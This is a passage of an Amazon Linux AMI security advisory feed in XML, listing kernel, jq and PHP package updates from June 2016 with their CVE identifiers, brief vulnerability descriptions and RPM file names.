</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8839" title="" id="CVE-2015-8839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0758" title="" id="CVE-2016-0758" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3961" title="" id="CVE-2016-3961" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4485" title="" id="CVE-2016-4485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4486" title="" id="CVE-2016-4486" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4557" title="" id="CVE-2016-4557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4558" title="" id="CVE-2016-4558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4565" title="" id="CVE-2016-4565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4581" title="" id="CVE-2016-4581" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.10-22.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.10" release="22.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.10-22.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.10" release="22.54.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.10-22.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-704</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-704: low priority package update for kernel</title><issued date="2016-06-02 17:36:00" /><updated date="2016-06-03 19:27:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4913:
The get_rock_ridge_filename function in fs/isofs/rock.c in the Linux kernel before 4.5.5 mishandles NM (aka alternate name) entries containing \\0 characters, which allows local users to obtain sensitive information from kernel memory or possibly have unspecified other impact via a crafted isofs filesystem.
1337528:
CVE-2016-4913 kernel: Information leak when handling NM entries containing NUL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4913" title="" id="CVE-2016-4913" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.11-23.53.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.11" release="23.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.11-23.53.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.11" release="23.53.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.11-23.53.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-705</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-705: medium priority package update for jq</title><issued date="2016-06-02 17:38:00" /><updated date="2016-06-03 19:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8863:
A heap-based buffer overflow flaw was found in jq&#039;s tokenadd() function. By tricking a victim into processing a specially crafted JSON file, an attacker could use this flaw to crash jq or, potentially, execute arbitrary code on the victim&#039;s system.
1328747:
CVE-2015-8863 jq: heap-buffer-overflow in tokenadd() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8863" title="" id="CVE-2015-8863" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jq" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-devel" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-devel-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-debuginfo" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-debuginfo-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-libs" version="1.5" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/jq-libs-1.5-1.2.amzn1.x86_64.rpm</filename></package><package name="jq-libs" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-libs-1.5-1.2.amzn1.i686.rpm</filename></package><package name="jq" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-1.5-1.2.amzn1.i686.rpm</filename></package><package name="jq-devel" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-devel-1.5-1.2.amzn1.i686.rpm</filename></package><package name="jq-debuginfo" version="1.5" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/jq-debuginfo-1.5-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-706</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-706: medium priority package update for php56</title><issued date="2016-06-02 17:44:00" /><updated date="2016-06-15 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5096:
1339949:
CVE-2016-5096 php: Integer underflow causing arbitrary null write in fread/gzread
CVE-2016-5095:
CVE-2016-5094:
1340738:
CVE-2016-5094 php: Integer overflow in php_html_entities()
CVE-2016-5093:
1339590:
CVE-2016-5093 php: Out-of-bounds heap read in get_icu_value_internal
CVE-2013-7456:
1340433:
CVE-2013-7456 gd, php: Out-of-bounds read in imagescale
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456" title="" id="CVE-2013-7456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093" title="" id="CVE-2016-5093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094" title="" id="CVE-2016-5094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5095" title="" id="CVE-2016-5095" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096" title="" id="CVE-2016-5096" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mssql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.22" release="1.125.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.22-1.125.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.22-1.125.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.22" release="1.125.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.22-1.125.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-707</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-707: medium priority package update for php55</title><issued date="2016-06-02 17:47:00" /><updated date="2016-06-15 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5096:
1339949:
CVE-2016-5096 php: Integer underflow causing arbitrary null write in fread/gzread
CVE-2016-5095:
CVE-2016-5094:
1340738:
CVE-2016-5094 php: Integer overflow in php_html_entities()
CVE-2016-5093:
1339590:
CVE-2016-5093 php: Out-of-bounds heap read in get_icu_value_internal
CVE-2016-4343:
The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.
1332454:
CVE-2016-4343 php: Uninitialized pointer in phar_make_dirstream()
CVE-2013-7456:
1340433:
CVE-2013-7456 gd, php: Out-of-bounds read in imagescale
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456" title="" id="CVE-2013-7456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4343" title="" id="CVE-2016-4343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093" title="" id="CVE-2016-5093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094" title="" id="CVE-2016-5094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5095" title="" id="CVE-2016-5095" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096" title="" id="CVE-2016-5096" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-xmlrpc" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.36" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.36-1.115.amzn1.x86_64.rpm</filename></package><package 